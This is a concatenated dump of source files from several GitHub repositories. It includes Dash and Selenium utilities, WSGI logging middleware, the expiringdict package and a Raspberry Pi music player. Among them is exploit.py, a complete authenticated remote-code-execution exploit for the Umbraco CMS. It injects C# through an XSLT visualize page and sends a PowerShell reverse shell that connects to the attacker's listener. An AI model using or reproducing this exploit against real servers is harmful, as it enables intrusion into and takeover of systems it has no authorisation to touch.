name = name_part[name_part.find('{') + 1: name_part.rfind('}')]
value_part = value_part.strip()
v0 = value_part[0]
if (v0 == value_part[-1] and v0 in ("'", '"', '`')):
value = value_part[1: -1].replace('\\' + v0, v0)
else:
try:
value = float(value_part)
except ValueError:
value = value_part
# word operators need spaces after them in the filter string,
# but we don't want these later
return name, operator_type[0].strip(), value
return [None] * 3
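
# For reference (illustrative note, not in the original file): given a Dash filter query
# part such as '{col_name} ge 10', split_filter_part returns ('col_name', 'ge', 10.0);
# quoted string values are unquoted, e.g. "{gene} contains 'TP53'" ->
# ('gene', 'contains', 'TP53').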
def expression_data_view():
return html.Div(id='table-container', children=[dt.DataTable(
id="data-table",
row_selectable='multi',
# sorting=True,
# filtering=True,
css=[{
"selector": ".dash-cell div.dash-cell-value",
"rule": "display: inline; "
"white-space: inherit; "
"overflow: auto; "
"text-overflow: inherit;"
}],
style_cell={
"whiteSpace": "no-wrap",
"overflow": "hidden",
"textOverflow": "ellipsis",
"maxWidth": 100,
'fontWeight': 100,
'fontSize': '11pt',
'fontFamily': 'Courier New',
'backgroundColor': '#1F2132'
},
style_header={
'backgroundColor': '#1F2132',
'textAlign': 'center'
},
style_table={
"maxHeight": "310px",
'width': '320px',
'marginTop': '5px',
'marginBottom': '10px',
},
# n_fixed_rows=1,
# n_fixed_columns=1
)])
``` |
{
"source": "JonnyWaffles/logscrapertutorial",
"score": 2
} |
#### File: logscrapertutorial/tests/test_data.py
```python
from collections import deque
from logscrapertutorial.data import fake
from logscrapertutorial.data.logfactory import create_fake_log, delete_data_files
from logscrapertutorial.utils import repeatfunc
def test_create_and_clean_up_logs():
log_count = fake.pyint(max_value=5, min_value=1)
gen = repeatfunc(create_fake_log, times=log_count)
deque(gen, 0)
assert delete_data_files() == log_count
```
#### File: logscrapertutorial/utils/func.py
```python
from collections import deque
from itertools import starmap, repeat
def repeatfunc(func, times=None, *args):
"""Repeat calls to func with specified arguments.
Example: repeatfunc(random.random)
"""
if times is None:
return starmap(func, repeat(args))
return starmap(func, repeat(args, times))
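
# Illustrative examples (not in the original file):
#   list(repeatfunc(random.random, 3))  -> three independent random floats
#   repeatfunc(random.random)           -> an endless iterator; consume it lazily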
def exhaust(generator):
"""Exausts an iterable. Shortcut to deque with maxlen 0.
As I understand it deque is the most Pythonic way to exhaust an iterable.
"""
deque(generator, maxlen=0)
``` |
{
"source": "JonnyWaffles/selenium_page",
"score": 3
} |
#### File: selenium_page/selenium_page/utils.py
```python
import re
from time import sleep
from selenium.common.exceptions import (ElementClickInterceptedException, ElementNotVisibleException)
from .decorators import coroutine
def safe_send_keys(elem, keys):
elem.clear()
elem.send_keys(keys)
def make_valid_field_names(names):
ret = []
unknown_field_counter = 1
for name in names:
name = name.strip()
if name == '':
name = 'unnamed' + str(unknown_field_counter)
unknown_field_counter += 1
else:
name = name.replace('#', 'number')
name = clean(name)
name = name.lower()
ret.append(name)
return ret
def clean(s):
# Remove invalid characters
s = re.sub('[^0-9a-zA-Z_]', '', s)
# Remove leading characters until we find a letter
s = re.sub('^[^a-zA-Z]+', '', s)
return s
def chunks(l, n):
"""
Yields successive n-sized chunks from list
credit to `Ned Batchelder`_
Args:
l (iterable): An iterable to be split in to n sized chunks
n (int): The size of the yielded chunks
Yields:
list: An n-sized list
.. _Ned Batchelder:
https://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks
"""
for i in range(0, len(l), n):
yield l[i:i+n]
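
# Illustrative example (not in the original file):
#   list(chunks([1, 2, 3, 4, 5], 2)) -> [[1, 2], [3, 4], [5]]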
@coroutine
def unique_key_generator(dictionary):
"""This generator object creates unique keys for the target dictionary.
If the key already exists in the dictionary it appends the number
of occurrences to the key name. Useful when creating search results identifiers.
Args:
dictionary (dict): The target dictionary to check
Yields:
str: A unique key name
"""
duplicate_keys = {}
# prime the key variable
key = None
while True:
key = (yield key)
if dictionary.get(key, None):
count = duplicate_keys.get(key, None) or 1
count += 1
duplicate_keys[key] = count
key = key + "_{}".format(str(count))
def scroll_to_click_element_until_timeout(element, timeout=10):
"""Attempts to click an element until timeout.
Scrolls to the element until the click succeeds or timeout.
Args:
element: Element to be clicked
timeout: Time before failure occurs
"""
driver = element.parent
counter = 0
while True:
try:
element.click()
return
except (ElementClickInterceptedException,
ElementNotVisibleException):
driver.execute_script('arguments[0].scrollIntoView();', element)
counter += 1
if counter > timeout:
break
sleep(1)
``` |
{
"source": "JonnyWaffles/wsgi-listener",
"score": 2
} |
#### File: wsgi-listener/tests/test_middleware.py
```python
import logging
from io import BytesIO
from wsgiref.util import setup_testing_defaults
from pytest import fixture
from .context import WSGIListenerMiddleware, DEFAULT_LISTENER_LOG_NAME
@fixture
def environ_factory():
def _environ_factory(**kwargs):
environ = dict(kwargs)
setup_testing_defaults(environ)
return environ
return _environ_factory
@fixture
def environ_with_request_body_factory(environ_factory):
def _factory(request_body: BytesIO = None, environ: dict = None):
if not environ:
environ = environ_factory()
if request_body:
environ['wsgi.input'] = request_body
environ['CONTENT_LENGTH'] = request_body.getbuffer().nbytes
return environ
return _factory
def app(environ, start_fn):
start_fn('200 OK', [('Content-Type', 'text/plain')])
yield b'Hello World!\n'
def start_response(status_code, headers, exc_info=None):
return status_code, headers, exc_info
def test_middleware_passthrough(environ_factory):
environ = environ_factory()
wrapped_app = WSGIListenerMiddleware(app)
rv = wrapped_app(environ, start_response)
assert next(rv) == b'Hello World!\n'
def test_middleware_default_response_listener(caplog, environ_factory):
environ = environ_factory()
wrapped_app = WSGIListenerMiddleware(app)
with caplog.at_level(logging.INFO, logger=DEFAULT_LISTENER_LOG_NAME):
wrapped_app(environ, start_response)
assert caplog.text
def test_listeners(environ_with_request_body_factory):
# noinspection PyAttributeOutsideInit,PyShadowingNames
class EchoRequestListener:
def handle(self, environ: dict, request_body: bytes, **kwargs):
self.environ = environ
self.request_body = request_body
# noinspection PyAttributeOutsideInit,PyShadowingNames
class EchoResponseListener:
def handle(self, status_code: int, environ: dict, content_length: int, response_body: bytes,
processing_time: float, **kwargs):
self.status_code = status_code
self.environ = environ
self.content_length = content_length
self.response_body = response_body
self.processing_time = processing_time
request_listener = EchoRequestListener()
response_listener = EchoResponseListener()
body = BytesIO(b'Test')
environ = environ_with_request_body_factory(body)
wrapped_app = WSGIListenerMiddleware(app, request_listeners=[request_listener],
response_listeners=[response_listener])
wrapped_app(environ, start_response)
assert request_listener.environ is environ
assert request_listener.request_body == b'Test'
assert response_listener.status_code
assert response_listener.environ is environ
assert response_listener.response_body == b'Hello World!\n'
assert response_listener.content_length == len(b'Hello World!\n')
assert response_listener.processing_time
```
#### File: wsgi-listener/wsgi_listener/formatters.py
```python
from datetime import datetime as dt
from .timehacks import Local
def standard_formatter(status_code, environ, content_length):
return "{0} {1}".format(dt.now().isoformat(), status_code)
# noinspection PyPep8Naming
def ApacheFormatter(with_response_time=True):
""" A factory that returns the wanted formatter """
if with_response_time:
return ApacheFormatters.format_with_response_time
else:
return ApacheFormatters.format_NCSA_log
# noinspection PyPep8Naming
class ApacheFormatters(object):
@staticmethod
def format_NCSA_log(status_code, environ, content_length, **kwargs):
"""
Apache log format 'NCSA extended/combined log':
"%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\""
see http://httpd.apache.org/docs/current/mod/mod_log_config.html#formats
"""
# Let's collect log values
val = dict()
ip_header = kwargs.get('ip_header', None)
if ip_header:
try:
val['host'] = environ.get(ip_header, '')
            except Exception:
val['host'] = environ.get('REMOTE_ADDR', '')
else:
val['host'] = environ.get('REMOTE_ADDR', '')
val['logname'] = '-'
val['user'] = '-'
date = dt.now(tz=Local)
month = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"][date.month - 1]
val['time'] = date.strftime("%d/{0}/%Y:%H:%M:%S %z".format(month))
val['request'] = "{0} {1} {2}".format(
environ.get('REQUEST_METHOD', ''),
environ.get('PATH_INFO', ''),
environ.get('SERVER_PROTOCOL', '')
)
val['status'] = status_code
val['size'] = content_length
val['referer'] = environ.get('HTTP_REFERER', '')
val['agent'] = environ.get('HTTP_USER_AGENT', '')
# see http://docs.python.org/3/library/string.html#format-string-syntax
FORMAT = '{host} {logname} {user} [{time}] "{request}" '
FORMAT += '{status} {size} "{referer}" "{agent}"'
return FORMAT.format(**val)
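
    # Example of a resulting log line (illustrative values):
    # 127.0.0.1 - - [10/Oct/2020:13:55:36 -0700] "GET /index.html HTTP/1.1" 200 1043 "" "curl/7.68.0"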
@staticmethod
def format_with_response_time(*args, **kwargs):
"""
        The dict kwargs should contain 'rt_us', the response time in microseconds.
This is the format for TinyLogAnalyzer:
https://pypi.python.org/pypi/TinyLogAnalyzer
"""
rt_us = kwargs.get('rt_us')
return ApacheFormatters.format_NCSA_log(*args, **kwargs) + " {0}/{1}".format(int(rt_us/1000000), rt_us)
``` |
{
"source": "JonnyWong16/Plex-Trakt-Scrobbler",
"score": 2
} |
#### File: library/extra/guid.py
```python
from plex.objects.core.base import Descriptor, Property
class Guid(Descriptor):
id = Property(type=str)
@classmethod
def from_node(cls, client, node):
return cls.construct(client, cls.helpers.find(node, 'Guid'), child=True)
``` |
{
"source": "JonnyWong16/python-plexapi",
"score": 2
} |
#### File: python-plexapi/tests/test_mixins.py
```python
from plexapi.exceptions import NotFound
from plexapi.utils import tag_singular
import pytest
from . import conftest as utils
TEST_MIXIN_TAG = "Test Tag"
CUTE_CAT_SHA1 = "9f7003fc401761d8e0b0364d428b2dab2f789dbb"
def _test_mixins_tag(obj, attr, tag_method):
add_tag_method = getattr(obj, "add" + tag_method)
remove_tag_method = getattr(obj, "remove" + tag_method)
field_name = tag_singular(attr)
_tags = lambda: [t.tag for t in getattr(obj, attr)]
_fields = lambda: [f for f in obj.fields if f.name == field_name]
# Check tag is not present to begin with
tags = _tags()
assert TEST_MIXIN_TAG not in tags
# Add tag and lock the field
add_tag_method(TEST_MIXIN_TAG)
obj.reload()
tags = _tags()
fields = _fields()
assert TEST_MIXIN_TAG in tags
assert fields and fields[0].locked
# Remove tag and unlock to field to restore the clean state
remove_tag_method(TEST_MIXIN_TAG, locked=False)
obj.reload()
tags = _tags()
fields = _fields()
assert TEST_MIXIN_TAG not in tags
assert not fields
def edit_collection(obj):
_test_mixins_tag(obj, "collections", "Collection")
def edit_country(obj):
_test_mixins_tag(obj, "countries", "Country")
def edit_director(obj):
_test_mixins_tag(obj, "directors", "Director")
def edit_genre(obj):
_test_mixins_tag(obj, "genres", "Genre")
def edit_label(obj):
_test_mixins_tag(obj, "labels", "Label")
def edit_mood(obj):
_test_mixins_tag(obj, "moods", "Mood")
def edit_producer(obj):
_test_mixins_tag(obj, "producers", "Producer")
def edit_similar_artist(obj):
_test_mixins_tag(obj, "similar", "SimilarArtist")
def edit_style(obj):
_test_mixins_tag(obj, "styles", "Style")
def edit_tag(obj):
_test_mixins_tag(obj, "tags", "Tag")
def edit_writer(obj):
_test_mixins_tag(obj, "writers", "Writer")
def _test_mixins_image(obj, attr):
cap_attr = attr[:-1].capitalize()
get_img_method = getattr(obj, attr)
set_img_method = getattr(obj, "set" + cap_attr)
upload_img_method = getattr(obj, "upload" + cap_attr)
images = get_img_method()
if images:
default_image = images[0]
image = images[0]
assert len(image.key) >= 10
if not image.ratingKey.startswith(("default://", "id://", "media://", "upload://")):
assert image.provider
assert len(image.ratingKey) >= 10
assert utils.is_bool(image.selected)
assert len(image.thumb) >= 10
print(images)
if len(images) >= 2:
# Select a different image
for i in images:
print(vars(i))
set_img_method(images[1])
images = get_img_method()
for i in images:
print(vars(i))
assert images[0].selected is False
assert images[1].selected is True
else:
default_image = None
# Test upload image from file
upload_img_method(filepath=utils.STUB_IMAGE_PATH)
images = get_img_method()
file_image = [
i for i in images
if i.ratingKey.startswith('upload://') and i.ratingKey.endswith(CUTE_CAT_SHA1)
]
assert file_image
# Reset to default image
if default_image:
set_img_method(default_image)
def edit_art(obj):
_test_mixins_image(obj, 'arts')
def edit_banner(obj):
_test_mixins_image(obj, 'banners')
def edit_poster(obj):
_test_mixins_image(obj, 'posters')
def _test_mixins_imageUrl(obj, attr):
url = getattr(obj, attr + 'Url')
if getattr(obj, attr):
assert url.startswith(utils.SERVER_BASEURL)
assert "/library/metadata/" in url or "/library/collections/" in url
assert attr in url or "composite" in url
if attr == 'thumb':
assert getattr(obj, 'posterUrl') == url
else:
assert url is None
def attr_artUrl(obj):
_test_mixins_imageUrl(obj, 'art')
def attr_bannerUrl(obj):
_test_mixins_imageUrl(obj, 'banner')
def attr_posterUrl(obj):
_test_mixins_imageUrl(obj, 'thumb')
def _test_mixins_editAdvanced(obj):
for pref in obj.preferences():
currentPref = obj.preference(pref.id)
currentValue = currentPref.value
newValue = next(v for v in pref.enumValues if v != currentValue)
obj.editAdvanced(**{pref.id: newValue})
obj.reload()
newPref = obj.preference(pref.id)
assert newPref.value == newValue
def _test_mixins_editAdvanced_bad_pref(obj):
with pytest.raises(NotFound):
assert obj.preference('bad-pref')
def _test_mixins_defaultAdvanced(obj):
obj.defaultAdvanced()
obj.reload()
for pref in obj.preferences():
assert pref.value == pref.default
def edit_advanced_settings(obj):
_test_mixins_editAdvanced(obj)
_test_mixins_editAdvanced_bad_pref(obj)
_test_mixins_defaultAdvanced(obj)
``` |
{
"source": "jonnyyu/expiringdict",
"score": 3
} |
#### File: expiringdict/expiringdict/__init__.py
```python
import time
from threading import RLock
import sys
from typing import Any, Union
try:
from collections import OrderedDict
except ImportError:
# Python < 2.7
from ordereddict import OrderedDict
class ExpiringDict(OrderedDict):
def __init__(self, max_len, max_age_seconds, items=None):
# type: (Union[int, None], Union[float, None], Union[None,dict,OrderedDict,ExpiringDict]) -> None
if not self.__is_instance_of_expiring_dict(items):
self.__assertions(max_len, max_age_seconds)
OrderedDict.__init__(self)
self.max_len = max_len
self.max_age = max_age_seconds
self.lock = RLock()
if sys.version_info >= (3, 5):
self._safe_keys = lambda: list(self.keys())
else:
self._safe_keys = self.keys
if items is not None:
if self.__is_instance_of_expiring_dict(items):
self.__copy_expiring_dict(max_len, max_age_seconds, items)
elif self.__is_instance_of_dict(items):
self.__copy_dict(items)
elif self.__is_reduced_result(items):
self.__copy_reduced_result(items)
else:
raise ValueError('can not unpack items')
def __contains__(self, key):
""" Return True if the dict has a key, else return False. """
try:
with self.lock:
item = OrderedDict.__getitem__(self, key)
if time.time() - item[1] < self.max_age:
return True
else:
del self[key]
except KeyError:
pass
return False
def __getitem__(self, key, with_age=False):
""" Return the item of the dict.
Raises a KeyError if key is not in the map.
"""
with self.lock:
item = OrderedDict.__getitem__(self, key)
item_age = time.time() - item[1]
if item_age < self.max_age:
if with_age:
return item[0], item_age
else:
return item[0]
else:
del self[key]
raise KeyError(key)
def __setitem__(self, key, value, set_time=None):
""" Set d[key] to value. """
with self.lock:
if len(self) == self.max_len:
if key in self:
del self[key]
else:
try:
self.popitem(last=False)
except KeyError:
pass
if set_time is None:
set_time = time.time()
OrderedDict.__setitem__(self, key, (value, set_time))
def pop(self, key, default=None):
""" Get item from the dict and remove it.
Return default if expired or does not exist. Never raise KeyError.
"""
with self.lock:
try:
item = OrderedDict.__getitem__(self, key)
del self[key]
return item[0]
except KeyError:
return default
def ttl(self, key):
""" Return TTL of the `key` (in seconds).
Returns None for non-existent or expired keys.
"""
key_value, key_age = self.get(key, with_age=True) # type: Any, Union[None, float]
if key_age:
key_ttl = self.max_age - key_age
if key_ttl > 0:
return key_ttl
return None
def get(self, key, default=None, with_age=False):
""" Return the value for key if key is in the dictionary, else default. """
try:
return self.__getitem__(key, with_age)
except KeyError:
if with_age:
return default, None
else:
return default
def items(self):
""" Return a copy of the dictionary's list of (key, value) pairs. """
r = []
for key in self._safe_keys():
try:
r.append((key, self[key]))
except KeyError:
pass
return r
def items_with_timestamp(self):
""" Return a copy of the dictionary's list of (key, value, timestamp) triples. """
r = []
for key in self._safe_keys():
try:
r.append((key, OrderedDict.__getitem__(self, key)))
except KeyError:
pass
return r
def values(self):
""" Return a copy of the dictionary's list of values.
See the note for dict.items(). """
r = []
for key in self._safe_keys():
try:
r.append(self[key])
except KeyError:
pass
return r
def fromkeys(self):
""" Create a new dictionary with keys from seq and values set to value. """
raise NotImplementedError()
def iteritems(self):
""" Return an iterator over the dictionary's (key, value) pairs. """
raise NotImplementedError()
def itervalues(self):
""" Return an iterator over the dictionary's values. """
raise NotImplementedError()
def viewitems(self):
""" Return a new view of the dictionary's items ((key, value) pairs). """
raise NotImplementedError()
def viewkeys(self):
""" Return a new view of the dictionary's keys. """
raise NotImplementedError()
def viewvalues(self):
""" Return a new view of the dictionary's values. """
raise NotImplementedError()
def __reduce__(self):
reduced = self.__class__, (self.max_len, self.max_age, ('reduce_result', self.items_with_timestamp()))
return reduced
def __assertions(self, max_len, max_age_seconds):
self.__assert_max_len(max_len)
self.__assert_max_age_seconds(max_age_seconds)
@staticmethod
def __assert_max_len(max_len):
assert max_len >= 1
@staticmethod
def __assert_max_age_seconds(max_age_seconds):
assert max_age_seconds >= 0
@staticmethod
def __is_reduced_result(items):
if len(items) == 2 and items[0] == 'reduce_result':
return True
return False
@staticmethod
def __is_instance_of_expiring_dict(items):
if items is not None:
if isinstance(items, ExpiringDict):
return True
return False
@staticmethod
def __is_instance_of_dict(items):
if isinstance(items, dict):
return True
return False
def __copy_expiring_dict(self, max_len, max_age_seconds, items):
# type: (Union[int, None], Union[float, None], Any) -> None
if max_len is not None:
self.__assert_max_len(max_len)
self.max_len = max_len
else:
self.max_len = items.max_len
if max_age_seconds is not None:
self.__assert_max_age_seconds(max_age_seconds)
self.max_age = max_age_seconds
else:
self.max_age = items.max_age
[self.__setitem__(key, value, set_time) for key, (value, set_time) in items.items_with_timestamp()]
def __copy_dict(self, items):
# type: (dict) -> None
[self.__setitem__(key, value) for key, value in items.items()]
def __copy_reduced_result(self, items):
[self.__setitem__(key, value, set_time) for key, (value, set_time) in items[1]]
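# --- Hedged usage sketch (added for illustration; not part of the original module) ---
# Assuming the class above is importable, a cache holding at most 100 entries that
# expire 10 seconds after insertion could be used like this:
#
#     cache = ExpiringDict(max_len=100, max_age_seconds=10)
#     cache['token'] = 'abc123'
#     cache.get('token')   # -> 'abc123' while fresh, None once expired
#     cache.ttl('token')   # -> remaining seconds, or None if missing/expired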
``` |
{
"source": "jono3030/study-data-admin-interface",
"score": 4
} |
#### File: study-data-admin-interface/e_mails/send_mails_v3.py
```python
from pathlib import Path
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import csv
import pandas as pd
# Define global variables
dir_path = Path.cwd()
password = 'password'
csv_new = str(dir_path) + '/create_participant/current_new.csv'
csv_reminder = str(dir_path) + '/check_completed/incomplete.csv'
bcc_email = 'bccemailaddress'
# Placeholder sender names referenced in the e-mail bodies below
nameofsender = 'nameofsender'
nameofsecondsender = 'nameofsecondsender'
# Main function
def sendemail(csv_path,type_choice):
"""Takes a csv with contact information as input and sends e-mails based on it"""
    # Define contact name placeholders (first name, last name)
contact_1 = ["First name", "Last name"]
contact_2 = ["First name", "Last name"]
contact_3 = ["First name", "Last name"]
contact_4 = ["First name", "Last name"]
contact_5 = ["First name", "Last name"]
contact_6 = ["First name", "Last name"]
contact_7 = ["First name", "Last name"]
contact_8 = ["First name", "Last name"]
participant_list = pd.read_csv(str(dir_path) + '/create_participant/current_new.csv')
dict_list = participant_list.list.unique()
chosen_list = str(dir_path) + '/e_mails/chosen_list.csv'
blacklist = pd.read_csv(str(dir_path) + '/create_participant/BLACKLIST.csv')
blacklist_id_list = list(blacklist.loc[:, "id"])
# Determine reminder type
dropped_list = pd.read_csv(csv_path) # Temp var for csv_path to drop
# Only for sending reminders
if type_choice == "reminder":
all_or_list = input("(1) All or (2) specific list? ")
if all_or_list == "2":
print("Which list?")
for i in dropped_list.list.unique():
print(i)
selected_reminder_list = input("Selection: ")
# Drop rows that are not relevant for selected list
for index, k in dropped_list.iterrows():
if k[4].strip() != selected_reminder_list:
dropped_list.drop(index, inplace=True)
# Drop rows that are on the blacklist
for index, g in dropped_list.iterrows():
if g[5].strip() in blacklist_id_list:
dropped_list.drop(index, inplace=True)
# Write dropped list to csv
final_dropped = dropped_list.to_csv(chosen_list, index=False)
# Import dropped list as csv_path
csv_path = str(dir_path) + '/e_mails/chosen_list.csv'
# Open csv file
with open(csv_path, 'r', newline='') as f:
reader = csv.reader(f, delimiter=',')
# Skip header
header = next(reader)
# loop to read csv file line by line and assign variables to row items
for row in reader:
last_name = row[0].strip()
first_name = row[1].strip()
affiliation = row[2].strip()
email = row[3].strip()
usr = row[5].strip()
pwd = row[6].strip()
transferent = ""
# Determine transferent
if row[4].strip() == "contact_1":
transferent = contact_1
elif row[4].strip() == "contact_2":
transferent = contact_2
elif row[4].strip() == "contact_3":
transferent = contact_3
elif row[4].strip() == "contact_4":
transferent = contact_4
elif row[4].strip() == "contact_5":
transferent = contact_5
elif row[4].strip() == "contact_6":
transferent = contact_6
elif row[4].strip() == "contact_7":
transferent = contact_7
elif row[4].strip() == "contact_8":
transferent = contact_8
else:
transferent = ["first name", "last name"]
# Use MIMEMultipart library to define required e-mail fields
msg = MIMEMultipart()
msg['To'] = email
bcc_recipients = bcc_email
msg['From'] = "emailaddressofsender"
msg['Subject'] = 'Study'
body_trans_initial = f""" <p>Dear {first_name},</p>
<p>I received your e-mail from {transferent[0]} {transferent[1]}. My name is {nameofsender} and I am working with Dr. {nameofsecondsender}, [...] </p>
<p>I am contacting you because {transferent[0]} believes that [...]</p>
<p>If you are willing to participate, please log in at <a href=\"website\">website</a> with the following unique participant name and password:</p>
<p><b>Usr:</b> {usr}</p>
<p><b>Pwd:</b> {pwd}</p>
<p>On the website you will find all relevant information regarding the study. You will be asked to answer a set of [...]</p>
<p>Please feel free to contact Dr. {nameofsecondsender} or me with any questions, technical issues or concerns.</p>
<p>Thank you for your support – we greatly appreciate it!</p>
<p>Best wishes,</p>
<p>{nameofsender} and Dr. {nameofsecondsender}</p> """
body_trans = f""" <p>Dear {first_name},</p>
<p>First of all, thank you very much for participating in the study - we greatly appreciate it. My name is {nameofsender} and I am working with Dr. {nameofsecondsender} on [...].</p>
<p>To complete the questionnaires, please log in at <a href=\"website\">website</a> with the following unique participantname and password:</p>
<p><b>Usr:</b> {usr}</p>
<p><b>Pwd:</b> {pwd}</p>
<p>On the website you will find all relevant information regarding the study. You will be asked to answer a set of [...]</p>
<p>Please feel free to contact Dr. {nameofsecondsender} or me with any questions, technical issues or concerns.</p>
<p>Every participant counts so, again, thank you for your support!</p>
<p>Best wishes,</p>
<p>{nameofsender} and Dr. {nameofsecondsender}</p> """
body_other = f""" <p>Dear {first_name},</p>
<p>My name is {nameofsender} and I am working with Dr. {nameofsecondsender} on [...]</p>
<p>Thank you very much for participating in our study. Your support is crucial for [...]</p>
<p><b>Usr:</b> {usr}</p>
<p><b>Pwd:</b> {pwd}</p>
<p>On the website you will find all relevant information regarding the study. You will be asked to answer a set of [...]</p>
<p>Please feel free to contact Dr. {nameofsecondsender} or me with any questions, technical issues or concerns.</p>
<p>Thank you again for your support – we greatly appreciate it!</p>
<p>Best wishes,</p>
<p>{nameofsender} and Dr. {nameofsecondsender}</p> """
body_reminder = f""" <p>Dear {first_name},</p>
<p>A while ago you very kindly agreed to help us with [...]</p>
<p>The information we will get from the questionnaires is crucial for the successful development of [...] we would greatly appreciate it if you could complete the questionnaire as soon as you can.</p>
<p>The website can be found at <a href=\"website\">website</a> and you can log in with the following unique participantname and password:</p>
<p><b>Usr:</b> {usr}</p>
<p><b>Pwd:</b> {pwd}</p>
<p>Thank you again for your support – we greatly appreciate it!</p>
<p>Best wishes,</p>
<p>Dr. {nameofsecondsender} and {nameofsender}</p> """
# Determine text
if type_choice == "initial":
if row[4].strip() == "other":
body = body_other
else:
body = body_trans
elif type_choice == "reminder":
body = body_reminder
msg.attach(MIMEText(body, 'html'))
# Actually sending the e-mails with smtplib
server = smtplib.SMTP('smtpserver', 111)
# server.set_debuglevel(1)
server.starttls()
server.login(msg['From'], password)
            try:
                validity_check = server.verify(email)
            except smtplib.SMTPException:
                validity_check = None  # VRFY is often disabled on servers; proceed with sending anyway
            finally:
                print(f"Sending e-mail to {first_name} {last_name} at {email}")
                server.sendmail(msg['From'], [email] + [bcc_recipients], msg.as_string())
                server.quit()
                print(validity_check)
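# --- Hedged note on the expected CSV layout (inferred from the row indexing above) ---
# column 0: last name, 1: first name, 2: affiliation, 3: e-mail address,
# column 4: contact list (or "other"), 5: participant user name, 6: password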
# Run function
sendemail(csv_new,"initial")
``` |
{
"source": "Jonoans/Umbraco-RCE",
"score": 2
} |
#### File: Jonoans/Umbraco-RCE/exploit.py
```python
from bs4 import BeautifulSoup
from threading import Thread
import argparse
import pwn
import re
import requests
def main():
login = args.user
    password = args.password
host = args.host
try:
initial = pwn.listen(4444)
final = pwn.listen(4445)
except Exception as e:
raise e
with open('exploit.cs', 'r') as csharp:
code = csharp.read().strip()
payload = f"""
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="csharp_user">
{code}
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="csharp_user:xml()"/>
</xsl:template>
</xsl:stylesheet>
"""
payload = payload.strip() % (args.ip, 4444)
stable_revshell = '$client = New-Object System.Net.Sockets.TCPClient("%s", 4445)' % args.ip
stable_revshell += ';$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
# Process Login
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = { "username": login, "password": password}
s = requests.session()
r2 = s.post(url_login,json=loginfo)
# Go to vulnerable web page
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)
soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE,
"__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
"ctl00$body$xsltSelection": payload,
"ctl00$body$contentPicker$ContentIdValue": "",
"ctl00$body$visualizeDo": "Visualize+XSLT" }
# Launch the attack
Thread(target=s.post, args=(url_xslt,), kwargs={'data': data, 'headers': headers}).start()
initial.wait_for_connection()
initial.sendline(stable_revshell.encode('ascii'))
final.wait_for_connection()
# Quick hack to display prompt lol
final.sendline(b'whoami')
final.recvline()
final.interactive(prompt='')
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='exploit.py',
description='Umbraco authenticated RCE',
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=80))
parser.add_argument('-u', '--user', metavar='USER', type=str,
required=True, dest='user', help='Username / Email')
parser.add_argument('-p', '--password', metavar='PASS', type=str,
required=True, dest='password', help='Login password')
parser.add_argument('-w', '--website-url', metavar='URL', type=str, required=True,
dest='host', help='Root URL')
parser.add_argument('-i', '--ip', metavar='IP', type=str, required=True,
dest='ip', help='IP address of callback listener')
args = parser.parse_args()
main()
``` |
{
"source": "jonobarel/rpi_musicbox",
"score": 3
} |
#### File: jonobarel/rpi_musicbox/playback.py
```python
import subprocess
class SongPlayer:
    def __init__(self, files_list: list, path="music/"):
        self.current = 0
        self.files_list = files_list
        self.path = path
        self.procs = []
        self.current_proc = None
        if files_list is None:
            raise ValueError('missing parameter: files_list cannot be None')
        if not isinstance(files_list, list):
            raise TypeError('files_list parameter is not a list')
        if len(files_list) < 1:
            raise ValueError('files_list is empty')
        for f in files_list:
            if not isinstance(f, str):
                raise TypeError('files_list must only contain strings')
    #Plays the next song on the list.
    #If a song is already playing, it toggles pause/resume instead.
    def play(self):
        #start a new track if nothing is playing yet or the last track has finished
        if self.current_proc is None or self.current_proc.poll() is not None:
            self.current_proc = subprocess.Popen(
                ["omxplayer", "--adev", "both", "--vol", "-2000", self.path + self.files_list[self.current]],
                start_new_session=True, stdin=subprocess.PIPE)
            self.current = (self.current + 1) % len(self.files_list)
        #if the process is still running, send omxplayer its pause/resume key on stdin
        elif self.current_proc.poll() is None:
            self.current_proc.stdin.write(b'p')
            self.current_proc.stdin.flush()
        else: #process is not running
            raise Exception('Could not pause or play track')
    def next(self):
        #Stop the current track (omxplayer quits on 'q'), then start the following one
        if self.current_proc is not None and self.current_proc.poll() is None:
            self.current_proc.stdin.write(b'q')
            self.current_proc.stdin.flush()
            self.current_proc.wait()
        self.current_proc = None
        self.play()
    #Pause the currently playing song
    #def pause(self):
    #def stop(self):
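# --- Hedged usage sketch (assumes omxplayer is installed and the files exist in music/) ---
#
#     player = SongPlayer(["song1.mp3", "song2.mp3"])
#     player.play()   # starts the first track, or toggles pause while one is playing
#     player.next()   # stops the current track and starts the following one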
``` |
{
"source": "JonoCameron/ChRIS_ultron_backEnd",
"score": 2
} |
#### File: chris_backend/core/admin.py
```python
from django.contrib import admin
from django.contrib.auth.models import Group
from rest_framework.authtoken.models import Token
from .models import ChrisInstance
